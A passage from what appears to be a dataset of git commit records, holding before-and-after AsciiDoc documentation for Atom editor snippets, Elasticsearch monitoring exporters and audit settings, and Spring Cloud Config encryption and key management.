\"snip\" and then hitting\n# tab.\n#\n# An example CoffeeScript snippet to expand log to console.log:\n#\n# '.source.coffee':\n# 'Console log':\n# 'prefix': 'log'\n# 'body': 'console.log $1'\n#\n# Each scope (e.g. '.source.coffee' above) can only be declared once.\n#\n# This file uses CoffeeScript Object Notation (CSON).\n# If you are unfamiliar with CSON, you can read more about it in the\n# Atom Flight Manual:\n# http:\/\/flight-manual.atom.io\/using-atom\/sections\/basic-customization\/#_cson\n'.source.asciidoc':\n 'Cross Reference Inter-Doc':\n 'prefix': 'xrefI'\n 'body': '<<${1:path\/to\/wiki\/page}#,${2:custom label text}>>'\n 'Cross Reference Module':\n 'prefix': 'xrefM'\n 'body': 'xref:${1:target-page-filename}.adoc[${2:link text}]'\n 'Cross Reference ROOT':\n 'prefix': 'xrefR'\n 'body': 'xref:ROOT:${1:target-page-filename}.adoc[${2:link text}]'\n 'Admonition Block':\n 'prefix': 'admonB'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n ====\n $6\n ====\n $7\n \"\"\"\n 'Admonition Block with Title':\n 'prefix': 'admonBwT'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n .${6:Optional Title}\n ====\n $7\n ====\n $8\n \"\"\"\n 'Admonition Paragraph':\n 'prefix': 'admonP'\n 'body': \"\"\"\n ${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}: $6\n \"\"\"\n 'Admonition Paragraph with Title':\n 'prefix': 'admonPwT'\n 'body': \"\"\"\n .${1:Optional Title}\n ${2:NOTE}${3:TIP}${4:IMPORTANT}${5:CAUTION}${6:WARNING}: $7\n \"\"\"\n","old_contents":"= Atom Snippets Page\n:author: mitm\n:revnumber: 2\n:revdate: 2017-09-08T23:24:11.262Z\n:relfileprefix: ..\/\n:imagesdir: ..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nEdit this file to add snippets to the snippets.cson file for the\nlink:https:\/\/atom.io\/[Atom editor]. To use these snippets just copy and paste\nthe text below into your snippets.cson file.\n\n[source]\n----\n# Your snippets\n#\n# Atom snippets allow you to enter a simple prefix in the editor and hit tab to\n# expand the prefix into a larger code block with templated values.\n#\n# You can create a new snippet in this file by typing \"snip\" and then hitting\n# tab.\n#\n# An example CoffeeScript snippet to expand log to console.log:\n#\n# '.source.coffee':\n# 'Console log':\n# 'prefix': 'log'\n# 'body': 'console.log $1'\n#\n# Each scope (e.g. '.source.coffee' above) can only be declared once.\n#\n# This file uses CoffeeScript Object Notation (CSON).\n# If you are unfamiliar with CSON, you can read more about it in the\n# Atom Flight Manual:\n# http:\/\/flight-manual.atom.io\/using-atom\/sections\/basic-customization\/#_cson\n'.source.asciidoc':\n 'Inter-Doc Cross Reference':\n 'prefix': 'xref'\n 'body': '<<${1:path\/to\/wiki\/page}#,${2:custom label text}>>'\n 'Admonition Block':\n 'prefix': 'admonB'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n ====\n $6\n ====\n $7\n \"\"\"\n 'Admonition Block with Title':\n 'prefix': 'admonBwT'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n .${6:Optional Title}\n ====\n $7\n ====\n $8\n \"\"\"\n 'Admonition Paragraph':\n 'prefix': 'admonP'\n 'body': \"\"\"\n ${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}: $6\n \"\"\"\n 'Admonition Paragraph with Title':\n 'prefix': 'admonPwT'\n 'body': \"\"\"\n .${1:Optional Title}\n ${2:NOTE}${3:TIP}${4:IMPORTANT}${5:CAUTION}${6:WARNING}: $7\n \"\"\"\n----\n\n== Snippets Explained\n\n[cols=\"10, 45,45\"*,options=\"header\"]\n|===\n\n| Prefix\n| Inserted Syntax\n| Description\n\n| xref\n|`+<<path\/to\/wiki\/page#,custom label text>>+`\n| Inserts an `Inter-Document Cross Reference`.\n\n| admonB\n| [NOTETIPIMPORTANTCAUTIONWARNING] +\n ==== +\n ====\n| Inserts an `Admonition Block` with the #NOTE# style highlighted. Use the kbd:[Tab] key to cycle to the next style\nand kbd:[Backspace] off any unwanted style as you go. The final kbd:[Tab] will take you into the block.\n\n| admonBwT\n| [NOTETIPIMPORTANTCAUTIONWARNING] +\n.Optional Title +\n ==== +\n ====\n| Inserts an `Admonition Block` with title.\n\n\n| admonP\n| NOTETIPIMPORTANTCAUTIONWARNING:\n| Inserts an `Admonition Paragraph` with the #NOTE# style highlighted. Use the kbd:[Tab] key to cycle to the next style\nand kbd:[Backspace] off any unwanted style as you go. The final kbd:[Tab] will take you to the beginning of the paragraph.\n\n| admonPwT\n| .Optional Title +\nNOTETIPIMPORTANTCAUTIONWARNING:\n| Inserts an `Admonition Paragraph` with title.\n\n|===\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"523324c1c866b574a86056a5e35aba8195e433cb","subject":"Add info on how to disable cleaner service (#64655) (#66704)","message":"Add info on how to disable cleaner service (#64655) (#66704)\n\nCo-authored-by: James Rodewig <d5d520df3f4564540f208acb32a86e5e141e7431@users.noreply.github.com>\r\n\r\nCo-authored-by: Julien Guay <d252e019ad03df882bfd6f98f9fb6735823befe5@yahoo.fr>","repos":"GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/monitoring\/local-export.asciidoc","new_file":"docs\/reference\/monitoring\/local-export.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n[[local-exporter]]\n=== Local exporters\n\n[IMPORTANT]\n=========================\n{metricbeat} is the recommended method for collecting and shipping monitoring\ndata to a monitoring cluster.\n\nIf you have previously configured legacy collection methods, you should migrate\nto using {metricbeat} collection methods. Use either {metricbeat} collection or\nlegacy collection methods; do not use both.\n\nLearn more about <<configuring-metricbeat>>.\n=========================\n\nThe `local` exporter is the default exporter in {monitoring}. It routes data\nback into the same (local) cluster. In other words, it uses the production\ncluster as the monitoring cluster. For example:\n\n[source,yaml]\n---------------------------------------------------\nxpack.monitoring.exporters.my_local_exporter: <1>\n type: local\n---------------------------------------------------\n<1> The exporter name uniquely defines the exporter, but it is otherwise unused.\n\nThis exporter exists to provide a convenient option when hardware is simply not\navailable. It is also a way for developers to get an idea of what their actions\ndo for pre-production clusters when they do not have the time or resources to\nprovide a separate monitoring cluster. However, this exporter has disadvantages\nthat impact the local cluster:\n\n* All indexing impacts the local cluster and the nodes that hold the monitoring\nindices' shards.\n* Most collectors run on the elected master node. Therefore most indexing occurs\nwith the elected master node as the coordinating node, which is a bad practice.\n* Any usage of {monitoring} for {kib} uses the local cluster's resources for\nsearches and aggregations, which means that they might not be available for\nnon-monitoring tasks.\n* If the local cluster goes down, the monitoring cluster has inherently gone\ndown with it (and vice versa), which generally defeats the purpose of monitoring.\n\nFor the `local` exporter, all setup occurs only on the elected master node. This\nmeans that if you do not see any monitoring templates or ingest pipelines, the\nelected master node is having issues or it is not configured in the same way.\nUnlike the `http` exporter, the `local` exporter has the advantage of accessing\nthe monitoring cluster's up-to-date cluster state. It can therefore always check\nthat the templates and ingest pipelines exist without a performance penalty. If\nthe elected master node encounters errors while trying to create the monitoring\nresources, it logs errors, ignores that collection, and tries again after the\nnext collection.\n\nThe elected master node is the only node to set up resources for the `local`\nexporter. Therefore all other nodes wait for the resources to be set up before\nindexing any monitoring data from their own collectors. Each of these nodes logs\na message indicating that they are waiting for the resources to be set up.\n\nOne benefit of the `local` exporter is that it lives within the cluster and\ntherefore no extra configuration is required when the cluster is secured with\n{stack} {security-features}. All operations, including indexing operations, that\noccur from a `local` exporter make use of the internal transport mechanisms\nwithin {es}. This behavior enables the exporter to be used without providing any\nuser credentials when {security-features} are enabled.\n\nFor more information about the configuration options for the `local` exporter,\nsee <<local-exporter-settings>>.\n\n[[local-exporter-cleaner]]\n==== Cleaner service\n\nOne feature of the `local` exporter, which is not present in the `http` exporter,\nis a cleaner service. The cleaner service runs once per day at 01:00 AM UTC on\nthe elected master node.\n\nThe role of the cleaner service is to clean, or curate, the monitoring indices\nthat are older than a configurable amount of time (the default is `7d`). This\ncleaner exists as part of the `local` exporter as a safety mechanism. The `http`\nexporter does not make use of it because it could enable a single misconfigured\nnode to prematurely curate data from other production clusters that share the\nsame monitoring cluster.\n\nIn a dedicated monitoring cluster, you can use the cleaner service without\nhaving to monitor the monitoring cluster itself. For example:\n\n[source,yaml]\n---------------------------------------------------\nxpack.monitoring.collection.enabled: false <1>\nxpack.monitoring.history.duration: 3d <2>\n---------------------------------------------------\n\n<1> Disables the collection of data on the monitoring cluster.\n<2> Lowers the default history duration from `7d` to `3d`. The minimum value is\n`1d`. This setting can be modified only when using a Gold or higher level\nlicense. For the Basic license level, it uses the default of 7 days.\n\nTo disable the cleaner service, add a disabled local exporter:\n\n[source,yaml]\n----\nxpack.monitoring.exporters.my_local.type: local <1>\nxpack.monitoring.exporters.my_local.enabled: false <2>\n----\n\n<1> Adds a local exporter named `my_local`\n<2> Disables the local exporter. This also disables the cleaner service.\n","old_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n[[local-exporter]]\n=== Local exporters\n\n[IMPORTANT]\n=========================\n{metricbeat} is the recommended method for collecting and shipping monitoring\ndata to a monitoring cluster.\n\nIf you have previously configured legacy collection methods, you should migrate\nto using {metricbeat} collection methods. Use either {metricbeat} collection or\nlegacy collection methods; do not use both.\n\nLearn more about <<configuring-metricbeat>>.\n=========================\n\nThe `local` exporter is the default exporter in {monitoring}. It routes data\nback into the same (local) cluster. In other words, it uses the production\ncluster as the monitoring cluster. For example:\n\n[source,yaml]\n---------------------------------------------------\nxpack.monitoring.exporters.my_local_exporter: <1>\n type: local\n---------------------------------------------------\n<1> The exporter name uniquely defines the exporter, but it is otherwise unused.\n\nThis exporter exists to provide a convenient option when hardware is simply not\navailable. It is also a way for developers to get an idea of what their actions\ndo for pre-production clusters when they do not have the time or resources to\nprovide a separate monitoring cluster. However, this exporter has disadvantages\nthat impact the local cluster:\n\n* All indexing impacts the local cluster and the nodes that hold the monitoring\nindices' shards.\n* Most collectors run on the elected master node. Therefore most indexing occurs\nwith the elected master node as the coordinating node, which is a bad practice.\n* Any usage of {monitoring} for {kib} uses the local cluster's resources for\nsearches and aggregations, which means that they might not be available for\nnon-monitoring tasks.\n* If the local cluster goes down, the monitoring cluster has inherently gone\ndown with it (and vice versa), which generally defeats the purpose of monitoring.\n\nFor the `local` exporter, all setup occurs only on the elected master node. This\nmeans that if you do not see any monitoring templates or ingest pipelines, the\nelected master node is having issues or it is not configured in the same way.\nUnlike the `http` exporter, the `local` exporter has the advantage of accessing\nthe monitoring cluster's up-to-date cluster state. It can therefore always check\nthat the templates and ingest pipelines exist without a performance penalty. If\nthe elected master node encounters errors while trying to create the monitoring\nresources, it logs errors, ignores that collection, and tries again after the\nnext collection.\n\nThe elected master node is the only node to set up resources for the `local`\nexporter. Therefore all other nodes wait for the resources to be set up before\nindexing any monitoring data from their own collectors. Each of these nodes logs\na message indicating that they are waiting for the resources to be set up.\n\nOne benefit of the `local` exporter is that it lives within the cluster and\ntherefore no extra configuration is required when the cluster is secured with\n{stack} {security-features}. All operations, including indexing operations, that\noccur from a `local` exporter make use of the internal transport mechanisms\nwithin {es}. This behavior enables the exporter to be used without providing any\nuser credentials when {security-features} are enabled.\n\nFor more information about the configuration options for the `local` exporter,\nsee <<local-exporter-settings>>.\n\n[[local-exporter-cleaner]]\n==== Cleaner service\n\nOne feature of the `local` exporter, which is not present in the `http` exporter,\nis a cleaner service. The cleaner service runs once per day at 01:00 AM UTC on\nthe elected master node.\n\nThe role of the cleaner service is to clean, or curate, the monitoring indices\nthat are older than a configurable amount of time (the default is `7d`). This\ncleaner exists as part of the `local` exporter as a safety mechanism. The `http`\nexporter does not make use of it because it could enable a single misconfigured\nnode to prematurely curate data from other production clusters that share the\nsame monitoring cluster.\n\nIn a dedicated monitoring cluster, the cleaning service can be used without\nhaving to also monitor the monitoring cluster. For example:\n\n[source,yaml]\n---------------------------------------------------\nxpack.monitoring.collection.enabled: false <1>\nxpack.monitoring.history.duration: 3d <2>\n---------------------------------------------------\n<1> Disable the collection of data on the monitoring cluster.\n<2> Lower the default history duration from `7d` to `3d`. The minimum value is\n`1d`. This setting can be modified only when using a Gold or higher level\nlicense. For the Basic license level, it uses the default of 7 days.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0cd35543da189b2f2f9ea4a667dd85a8330089a1","subject":"DOCS Correct audit emit_node_id default value as false (#56995)","message":"DOCS Correct audit emit_node_id default value as false (#56995)\n\nSince version 7, the `xpack.security.audit.logfile.emit_node_id` setting defaults\r\nto `false`, yet the docs say otherwise. This commit fixes that.","repos":"robin13\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/reference\/settings\/audit-settings.asciidoc","new_file":"docs\/reference\/settings\/audit-settings.asciidoc","new_contents":"[role=\"xpack\"]\n[[auditing-settings]]\n=== Auditing security settings\n++++\n<titleabbrev>Auditing settings<\/titleabbrev>\n++++\n\nYou configure security auditing settings in the `elasticsearch.yml` configuration file\non each node in the cluster. For more information, see <<enable-audit-logging>>.\n\n[[general-audit-settings]]\n==== General Auditing Settings\n\n`xpack.security.audit.enabled`::\nSet to `true` to enable auditing on the node. The default value is `false`.\nThis puts the auditing events in a dedicated file named `<clustername>_audit.json`\non each node. \n\n[[event-audit-settings]]\n==== Audited Event Settings\n\nThe events and some other information about what gets logged can be controlled\nby using the following settings:\n\n`xpack.security.audit.logfile.events.include`::\nSpecifies which events to include in the auditing output. The default value is:\n`access_denied, access_granted, anonymous_access_denied, authentication_failed,\nconnection_denied, tampered_request, run_as_denied, run_as_granted`.\n\n`xpack.security.audit.logfile.events.exclude`::\nExcludes the specified events from the output. By default, no events are\nexcluded.\n\n`xpack.security.audit.logfile.events.emit_request_body`::\nSpecifies whether to include the request body from REST requests on certain\nevent types such as `authentication_failed`. The default value is `false`.\n+\n--\nIMPORTANT: No filtering is performed when auditing, so sensitive data may be\naudited in plain text when including the request body in audit events.\n--\n\n[[node-audit-settings]]\n==== Local Node Info Settings\n\n`xpack.security.audit.logfile.emit_node_name`::\nSpecifies whether to include the <<node.name,node name>> as a field in\neach audit event. The default value is `false`.\n\n`xpack.security.audit.logfile.emit_node_host_address`::\nSpecifies whether to include the node's IP address as a field in each audit event.\nThe default value is `false`.\n\n`xpack.security.audit.logfile.emit_node_host_name`::\nSpecifies whether to include the node's host name as a field in each audit event.\nThe default value is `false`.\n\n`xpack.security.audit.logfile.emit_node_id`::\nSpecifies whether to include the node id as a field in each audit event.\nThis is available for the new format only. That is to say, this information\ndoes not exist in the `<clustername>_access.log` file.\nUnlike <<node.name,node name>>, whose value might change if the administrator\nchanges the setting in the config file, the node id will persist across cluster\nrestarts and the administrator cannot change it.\nThe default value is `true`.\n\n[[audit-event-ignore-policies]]\n==== Audit Logfile Event Ignore Policies\n\nThese settings affect the <<audit-log-ignore-policy,ignore policies>>\nthat enable fine-grained control over which audit events are printed to the log file.\nAll of the settings with the same policy name combine to form a single policy.\nIf an event matches all of the conditions for a specific policy, it is ignored \nand not printed.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.users`::\nA list of user names or wildcards. The specified policy will\nnot print audit events for users matching these values.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.realms`::\nA list of authentication realm names or wildcards. The specified policy will\nnot print audit events for users in these realms.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.roles`::\nA list of role names or wildcards. The specified policy will\nnot print audit events for users that have these roles. If the user has several\nroles, some of which are *not* covered by the policy, the policy will\n*not* cover this event.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.indices`::\nA list of index names or wildcards. The specified policy will\nnot print audit events when all the indices in the event match\nthese values. If the event concerns several indices, some of which are\n*not* covered by the policy, the policy will *not* cover this event.\n","old_contents":"[role=\"xpack\"]\n[[auditing-settings]]\n=== Auditing security settings\n++++\n<titleabbrev>Auditing settings<\/titleabbrev>\n++++\n\nYou configure security auditing settings in the `elasticsearch.yml` configuration file\non each node in the cluster. For more information, see <<enable-audit-logging>>.\n\n[[general-audit-settings]]\n==== General Auditing Settings\n\n`xpack.security.audit.enabled`::\nSet to `true` to enable auditing on the node. The default value is `false`.\nThis puts the auditing events in a dedicated file named `<clustername>_audit.json`\non each node. \n\n[[event-audit-settings]]\n==== Audited Event Settings\n\nThe events and some other information about what gets logged can be controlled\nby using the following settings:\n\n`xpack.security.audit.logfile.events.include`::\nSpecifies which events to include in the auditing output. The default value is:\n`access_denied, access_granted, anonymous_access_denied, authentication_failed,\nconnection_denied, tampered_request, run_as_denied, run_as_granted`.\n\n`xpack.security.audit.logfile.events.exclude`::\nExcludes the specified events from the output. By default, no events are\nexcluded.\n\n`xpack.security.audit.logfile.events.emit_request_body`::\nSpecifies whether to include the request body from REST requests on certain\nevent types such as `authentication_failed`. The default value is `false`.\n+\n--\nIMPORTANT: No filtering is performed when auditing, so sensitive data may be\naudited in plain text when including the request body in audit events.\n--\n\n[[node-audit-settings]]\n==== Local Node Info Settings\n\n`xpack.security.audit.logfile.emit_node_name`::\nSpecifies whether to include the <<node.name,node name>> as a field in\neach audit event.\nThe default value is `true`.\n\n`xpack.security.audit.logfile.emit_node_host_address`::\nSpecifies whether to include the node's IP address as a field in each audit event.\nThe default value is `false`.\n\n`xpack.security.audit.logfile.emit_node_host_name`::\nSpecifies whether to include the node's host name as a field in each audit event.\nThe default value is `false`.\n\n`xpack.security.audit.logfile.emit_node_id`::\nSpecifies whether to include the node id as a field in each audit event.\nThis is available for the new format only. That is to say, this information\ndoes not exist in the `<clustername>_access.log` file.\nUnlike <<node.name,node name>>, whose value might change if the administrator\nchanges the setting in the config file, the node id will persist across cluster\nrestarts and the administrator cannot change it.\nThe default value is `true`.\n\n[[audit-event-ignore-policies]]\n==== Audit Logfile Event Ignore Policies\n\nThese settings affect the <<audit-log-ignore-policy,ignore policies>>\nthat enable fine-grained control over which audit events are printed to the log file.\nAll of the settings with the same policy name combine to form a single policy.\nIf an event matches all of the conditions for a specific policy, it is ignored \nand not printed.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.users`::\nA list of user names or wildcards. The specified policy will\nnot print audit events for users matching these values.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.realms`::\nA list of authentication realm names or wildcards. The specified policy will\nnot print audit events for users in these realms.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.roles`::\nA list of role names or wildcards. The specified policy will\nnot print audit events for users that have these roles. If the user has several\nroles, some of which are *not* covered by the policy, the policy will\n*not* cover this event.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.indices`::\nA list of index names or wildcards. The specified policy will\nnot print audit events when all the indices in the event match\nthese values. If the event concerns several indices, some of which are\n*not* covered by the policy, the policy will *not* cover this event.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a0b9fc6cedb8aef2eaaec6a9661ae575dfba1efb","subject":"Update docs to show encrypt key is mandatory","message":"Update docs to show encrypt key is mandatory\n","repos":"fangjing828\/spring-cloud-config,appleman\/spring-cloud-config,royclarkson\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config,shakuzen\/spring-cloud-config,mstine\/spring-cloud-config,thomasdarimont\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config,psbateman\/spring-cloud-config,shakuzen\/spring-cloud-config,fkissel\/spring-cloud-config,rajkumargithub\/spring-cloud-config,mbenson\/spring-cloud-config,appleman\/spring-cloud-config,rajkumargithub\/spring-cloud-config,mbenson\/spring-cloud-config,shakuzen\/spring-cloud-config,psbateman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,marbon87\/spring-cloud-config,spring-cloud\/spring-cloud-config,appleman\/spring-cloud-config,marbon87\/spring-cloud-config,thomasdarimont\/spring-cloud-config,marbon87\/spring-cloud-config,mstine\/spring-cloud-config,spring-cloud\/spring-cloud-config,royclarkson\/spring-cloud-config,royclarkson\/spring-cloud-config,psbateman\/spring-cloud-config,spring-cloud\/spring-cloud-config,rajkumargithub\/spring-cloud-config,mstine\/spring-cloud-config,mbenson\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_contents":"= Spring Cloud Config\n:toc:\n\ninclude::intro.adoc[]\n\n== Quick Start\n\ninclude::quickstart.adoc[]\n\n== Spring Cloud Config Server\n\nThe Server provides an HTTP, resource-based API for external\nconfiguration (name-value pairs, or equivalent YAML content). The\nserver is easily embeddable in a Spring Boot application using the\n`@EnableConfigServer` annotation.\n\n=== Environment Repository\n\nWhere do you want to store the configuration data for the Config\nServer? The strategy that governs this behaviour is the\n`EnvironmentRepository`, serving `Environment` objects. This\n`Environment` is a shallow copy of the domain from the Spring\n`Environment` (including `propertySources` as the main feature). The\n`Environment` resources are parametrized by three variables:\n\n\n* `{application}` maps to \"spring.application.name\" on the client side;\n\n* `{profile}` maps to \"spring.active.profiles\" on the client (comma separated list); and \n\n* `{label}` which is a server side feature labelling a \"versioned\" set of config files.\n\nRepository implementations generally behave just like a Spring Boot\napplication loading configuration files from a \"spring.config.name\"\nequal to the `{application}` parameter, and \"spring.profiles.active\"\nequal to the `{profiles}` parameter. Precedence rules for profiles are\nalso the same as in a regular Boot application: active profiles take\nprecedence over defaults, and if there are multiple profiles the last\none wins (like adding entries to a `Map`).\n\nExample: a client application has this bootstrap configuration:\n\n.bootstrap.yml\n----\nspring:\n application:\n name: foo\n profiles:\n active: dev,mysql\n----\n\n(as usual with a Spring Boot application, these properties could also\nbe set as environment variables or command line arguments). \n\nIf the repository is file-based, the server will create an\n`Environment` from `application.yml` (shared between all clients), and\n`foo.yml` (with `foo.yml` taking precedence). If the YAML files have\ndocuments inside them that point to Spring profiles, those are applied\nwith higher precendence (in order of the profiles listed), and if\nthere are profile-specific YAML (or properties) files these are also\napplied with higher precedence than the defaults. Higher precendence\ntranslates to a `PropertySource` listed earlier in the\n`Environment`. (These are the same rules as apply in a standalone\nSpring Boot application.)\n\n==== Git Backend\n\nThe default implementation of `EnvironmentRepository` uses a Git\nbackend, which is very convenient for managing upgrades and physical\nenvironments, and also for auditing changes. To change the location of\nthe repository you can set the \"spring.cloud.config.server.git.uri\"\nconfiguration property in the Config Server (e.g. in\n`application.yml`). If you set it with a `file:` prefix it should work\nfrom a local repository so you can get started quickly and easily\nwithout a server, but in that case the server operates directly on the\nlocal repository without cloning it (it doesn't matter if it's not\nbare because the Config Server never makes changes to the \"remote\"\nrepository). To scale the Config Server up and make it highly\navailable, you would need to have all instances of the server pointing\nto the same repository, so only a shared file system would work. Even\nin that case it is better to use the `ssh:` protocol for a shared\nfilesystem repository, so that the server can clone it and use a local\nworking copy as a cache.\n\nThis repository implementation maps the `{label}` parameter of the\nHTTP resource to a git label (commit id, branch name or tag).\n\n==== File System Backend\n\nThere is also a \"native\" profile in the Config Server that doesn't use\nGit, but just loads the config files from the local classpath or file\nsystem (any static URL you want to point to with\n\"spring.cloud.config.server.native.locations\"). To use the native\nprofile just launch the Config Server with\n\"spring.profiles.active=native\". \n\nThis repository implementation maps the `{label}` parameter of the\nHTTP resource to a suffix on the search path, so properties files are\nloaded from each search location *and* a subdirectory with the same\nname as the label (the labelled properties take precedence in the\nSpring Environment).\n\n=== Security\n\nYou are free to secure your Config Server in any way that makes sense\nto you (from physical network security to OAuth2 bearer\ntokens), and Spring Security and Spring Boot make it easy to do pretty\nmuch anything. \n\nTo use the default Spring Boot configured HTTP Basic security, just\ninclude Spring Security on the classpath (e.g. through\n`spring-boot-starter-security`). The default is a username of \"user\"\nand a randomly generated password, which isn't going to be very useful\nin practice, so we recommend you configure the password (via\n`security.user.password`) and encrypt it (see below for instructions\non how to do that).\n\n=== Encryption and Decryption\n\nIMPORTANT: **Prerequisites:** to use the encryption and decryption features\nyou need the full-strength JCE installed in your JVM (it's not there by default).\nYou can download the \"Java Cryptography Extension (JCE) Unlimited Strength Jurisdiction Policy Files\"\nfrom Oracle, and follow instructions for installation (essentially replace the 2 policy files\nin the JRE lib\/security directory with the ones that you downloaded).\n\nThe server exposes `\/encrypt` and `\/decrypt` endpoints (on the\nassumption that these will be secured and only accessed by authorized\nagents). If the remote property sources contain encryted content\n(values starting with `{cipher}`) they will be decrypted before\nsending to clients over HTTP. The main advantage of this set up is\nthat the property values don't have to be in plain text when they are\n\"at rest\" (e.g. in a git repository). If a value cannot be decrypted\nit is replaced with an empty string, largely to prevent cipher text\nbeing used as a password in Spring Boot autconfigured HTTP basic.\n\nIf you are setting up a remote config repository for config client\napplications it might contain an `application.yml` like this, for\ninstance:\n\n.application.yml\n----\nspring:\n datasource:\n username: dbuser\n password: {cipher}FKSAJDFGYOS8F7GLHAKERGFHLSAJ\n----\n\nYou can safely push this plain text to a shared git repository and the\nsecret password is protected.\n\nIf you are editing a remote config file you can use the Config Server\nto encrypt values by POSTing to the `\/encrypt` endpoint, e.g.\n\n----\n$ curl localhost:8888\/encrypt -d mysecret\n682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\n----\n\nThe inverse operation is also available via `\/decrypt` (provided the server is\nconfigured with a symmetric key or a full key pair):\n\n----\n$ curl localhost:8888\/decrypt -d 682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\nmysecret\n----\n\nTake the encypted value and add the `{cipher}` prefix before you put\nit in the YAML or properties file, and before you commit and push it\nto a remote, potentially insecure store.\n\nThe `spring` command line client (with Spring Cloud CLI extensions\ninstalled) can also be used to encrypt and decrypt, e.g.\n\n----\n$ spring encrypt mysecret --key foo\n682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\n$ spring decrypt --key foo 682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\nmysecret\n----\n\nTo use a key in a file (e.g. an RSA public key for encyption) prepend\nthe key value with \"@\" and provide the file path, e.g.\n\n----\n$ spring encrypt mysecret --key @${HOME}\/.ssh\/id_rsa.pub\nAQAjPgt3eFZQXwt8tsHAVv\/QHiY5sI2dRcR+...\n----\n\nThe key argument is mandatory (despite having a `--` prefix).\n\n=== Key Management\n\nThe Config Server can use a symmetric (shared) key or an asymmetric\none (RSA key pair). The asymmetric choice is superior in terms of\nsecurity, but it is often more convenient to use a symmetric key since\nit is just a single property value to configure.\n\nTo configure a symmetric key you just need to set `encrypt.key` to a\nsecret String (or use an enviroment variable `ENCRYPT_KEY` to keep it\nout of plain text configuration files). You can also POST a key value\nto the `\/key` endpoint (but that won't change any existing encrypted\nvalues in remote repositories).\n\nTo configure an asymmetric key you can either set the key as a\nPEM-encoded text value (in `encrypt.key`), or via a keystore (e.g. as\ncreated by the `keytool` utility that comes with the JDK). The\nkeystore properties are `encrypt.keyStore.\\*` with `*` equal to\n\n* `location` (a `Resource` location), \n* `password` (to unlock the keystore) and \n* `alias` (to identify which key in the store is to be\nused).\n\nThe encryption is done with the public key, and a private key is\nneeded for decryption. Thus in principle you can configure only the\npublic key in the server if you only want to do encryption (and are\nprepared to decrypt the values yourself locally with the private\nkey). In practice you might not want to do that because it spreads the\nkey management process around all the clients, instead of\nconcentrating it in the server. On the other hand it's a useful option\nif your config server really is relatively insecure and only a\nhandful of clients need the encrypted properties.\n\n=== Creating a Key Store for Testing\n\nTo create a keystore for testing you can do something like this:\n\n----\n$ keytool -genkeypair -alias mytestkey -keyalg RSA \\\n -dname \"CN=Web Server,OU=Unit,O=Organization,L=City,S=State,C=US\" \\\n -keypass changeme -keystore server.jks -storepass letmein\n----\n\nPut the `server.jks` file in the classpath (for instance) and then in\nyour `application.yml` for the Config Server:\n\n----\nencrypt:\n keyStore:\n location: classpath:\/server.jks\n alias: mytestkey\n password: letmein\n----\n\n=== Embedding the Config Server\n\nThe Config Server runs best as a standalone application, but if you\nneed to you can embed it in another application. Just use the\n`@EnableConfigServer` annotation and (optionally) set\n`spring.cloud.config.server.prefix` to a path prefix, e.g. \"\/config\",\nto serve the resources under a prefix. The prefix should start but not\nend with a \"\/\". It is applied to the `@RequestMappings` in the Config\nServer (i.e. underneath the Spring Boot prefixes `server.servletPath`\nand `server.contextPath`).\n\n== Spring Cloud Config Client\n\nA Spring Boot application can take immediate advantage of the 